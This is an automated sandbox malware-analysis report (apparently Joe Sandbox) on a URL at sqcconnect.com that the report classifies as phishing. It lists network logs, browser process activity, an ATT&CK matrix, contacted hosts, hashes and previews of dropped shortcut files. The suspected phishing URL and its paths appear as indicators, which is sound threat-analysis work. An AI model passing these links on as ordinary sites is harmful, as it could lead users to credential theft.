Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal48.phis.win@21/30@16/7
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2000,i,529291151797624790,14523265162952734100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=2000,i,529291151797624790,14523265162952734100,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://sqcconnect.com/editor/scripts.js0%Avira URL Cloudsafe
https://sqcconnect.com/editor/save0%Avira URL Cloudsafe
https://sqcconnect.com/editor/f.js0%Avira URL Cloudsafe
https://sqcconnect.com/editor/anti0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
sqcconnect.com
103.233.24.19
truefalse
    high
    challenges.cloudflare.com
    104.18.94.41
    truefalse
      high
      www.google.com
      172.217.19.228
      truefalse
        high
        faviconkit.b-cdn.net
        89.35.237.170
        truefalse
          unknown
          api.faviconkit.com
          unknown
          unknownfalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://sqcconnect.com/editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839ffalse
              unknown
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                high
                https://sqcconnect.com/editor/f.jstrue
                • Avira URL Cloud: safe
                unknown
                https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.jsfalse
                  high
                  https://sqcconnect.com/editor/scripts.jstrue
                  • Avira URL Cloud: safe
                  unknown
                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f37b3a32d2d4387&lang=autofalse
                    high
                    https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                      high
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f37b31c6b081a48&lang=autofalse
                        high
                        https://api.faviconkit.com/modula.com/144false
                          high
                          https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839ffalse
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/kt8az/0x4AAAAAAA0Aa6igGlTE6pvw/auto/fbE/normal/auto/false
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/mwsoc/0x4AAAAAAA0AZ98IMQtWtTui/auto/fbE/normal/auto/false
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/336816551:1734444914:H7AwvCHEDObeSZScAcpjc5TTruO7fZKfwv33awfQW9E/8f37b31c6b081a48/hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdXfalse
                                  high
                                  https://api.faviconkit.com/modula.comfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8f37b31c6b081a48/1734446759969/c1142f163fc1c29288a0cfa12faf7d55d96029302270ed9bae2be5d9724f6269/5PlURqfpRSBIM7ffalse
                                      high
                                      https://sqcconnect.com/editor/savefalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://sqcconnect.com/editor/antifalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f37b31c6b081a48/1734446759973/CLx1W--8BWsJolIfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        172.217.19.228
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        104.18.94.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        103.233.24.19
                                        sqcconnect.comIndia
                                        133296WEBWERKS-AS-INWebWerksIndiaPvtLtdINfalse
                                        104.18.95.41
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        89.35.237.170
                                        faviconkit.b-cdn.netRomania
                                        34304TEENTELECOMROfalse
                                        IP
                                        192.168.2.17
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1576800
                                        Start date and time:2024-12-17 15:45:14 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 3m 23s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:20
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal48.phis.win@21/30@16/7
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, TextInputHost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.206, 64.233.164.84, 172.217.17.46, 2.22.50.144, 172.217.17.35, 23.218.208.109, 4.175.87.197, 13.107.5.88, 20.231.128.65, 2.16.158.80
                                        • Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, evoke-windowsservices-tas.msedge.net, update.googleapis.com, clients.l.google.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        No simulations
                                        No context
                                        No context
                                        No context
                                        No context
                                        No context
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 13:45:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2677
                                        Entropy (8bit):3.9968647961079693
                                        Encrypted:false
                                        SSDEEP:48:85QdqT37skHGidAKZdA1JehwiZUklqehly+3:85t8Nqy
                                        MD5:78D904E1AEC2C5A4627D31F33A00CD0F
                                        SHA1:709ACCEFBC5AB4741E24CD6766DDF653A9E094AF
                                        SHA-256:253B8B45F16F45BB1E0EACF37811BBDC6E0C1DB258BC831A84C80CEB539E67BA
                                        SHA-512:3D12E8E2F429E0EE7C8ADC7B9E2C294C1EF07F0F3BF784324C4836C161F293C5E39D6524CE954A9F977459367BC19838A6BA099747CF1180E29A98595C7F7A18
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,.....u.[.P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.u....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.u....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.u....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.u...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.u...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........(.v<.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 13:45:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2679
                                        Entropy (8bit):4.012257253732759
                                        Encrypted:false
                                        SSDEEP:48:8XcaQdqT37skHGidAKZdA10eh/iZUkAQkqehay+2:8sat8X9Qny
                                        MD5:52246B1D2CBAB1791F44D4360BCF5381
                                        SHA1:4CFA74810F5D621343442748AF360BF9F8C98E8B
                                        SHA-256:CD15BBB4FA4AD4B9F14453F60353331BECEDA0687ACD4628C06E226C13D29CD5
                                        SHA-512:1F36263F014AD78D47F4FECE9FB2E7D58F12C7082BA89229E6D9C102121F5B2DFF07F4F0F2AF13888136A1DE739B17123CF7FC2C9B5BF5E6E04B109044C7C0EC
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,....?.w[.P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.u....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.u....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.u....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.u...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.u...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........(.v<.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2693
                                        Entropy (8bit):4.019785385427699
                                        Encrypted:false
                                        SSDEEP:48:8eQdqT37sjHGidAKZdA14tIeh7sFiZUkmgqeh7sMy+BX:8et8mnmy
                                        MD5:AF5942BC3882280F200BC9091D8D4CBD
                                        SHA1:D2AB8BC83C4DC95B932809B7B3722F291BC2FAC8
                                        SHA-256:BAE549D40358F64DDB753061BA400D529C0556BD7F06BA1A48F6DABBCBBED867
                                        SHA-512:E7DEE690A9C1F45DF3EED8C6E25B2DD2F38F90F93E7B27D7A6ACA2155A102AA4704C73A67E77CB9901192EFCF6AEB64310CDE531B81DFF507CB1A6200822940F
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.u....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.u....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.u....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.u...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........(.v<.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 13:45:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2681
                                        Entropy (8bit):4.007977964155173
                                        Encrypted:false
                                        SSDEEP:48:8UQdqT37skHGidAKZdA1behDiZUkwqehey+R:8Ut8Eky
                                        MD5:05BAC29BD842B801BFD5AE40DC24000A
                                        SHA1:72795C473E6F91B8E11DF5FED0D6149095435057
                                        SHA-256:2FC11C2AE50A051A884C113C19FA7092FC8AA5B46E027C67986AC9797630FE95
                                        SHA-512:31F7D0C9A75390FFF81B754E1ED505D400CCCFE42ABF4211C745E1B404DEB77A5D3EF1BA04D41BA52B9253DB882BB226C0F97C2BD927F74C810C0CA731A7F9B2
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,....;gp[.P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.u....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.u....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.u....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.u...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.u...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........(.v<.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 13:45:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2681
                                        Entropy (8bit):3.999548238298891
                                        Encrypted:false
                                        SSDEEP:48:8+QdqT37skHGidAKZdA1VehBiZUk1W1qehoy+C:8+t8k9Iy
                                        MD5:1A91A52B897FA16C0DEE7CEB7FE6581C
                                        SHA1:E6F479C38F6B4EC6A91D842A1AD2538A4BB975F3
                                        SHA-256:37425CF49468241F21FEA8CEEF54653764D569A5E67F37E74B0634F083E63BAA
                                        SHA-512:C976E9D44FFCB219CEB99DC1704C27DBC6066838A6D2FAACBAADC55C6411DEEA8B3994A3E54AD180F34746CB85CC82C775AD80B7A5EE3CB0845DAA46DF6D4C72
                                        Malicious:false
                                        Reputation:low
                                        Preview:L..................F.@.. ...$+.,......~[.P......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.u....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.u....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.u....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.u...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.u...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........(.v<.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 17 13:45:46 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                        Category:dropped
                                        Size (bytes):2683
                                        Entropy (8bit):4.007849504305559
                                        Encrypted:false
                                        SSDEEP:48:84QdqT37skHGidAKZdA1duT6ehOuTbbiZUk5OjqehOuTbmy+yT+:84t8uTTTbxWOvTbmy7T
                                        MD5:1C9DF1A2C9D807E54708D0995B33B47E
                                        SHA1:99EE77D85A0CC58E0298EEBD7F27DBF1495E8649
                                        SHA-256:74140D084472E9A9C33C0C68366FE66131779311707CA0B090D5B0D6FEFDBB0D
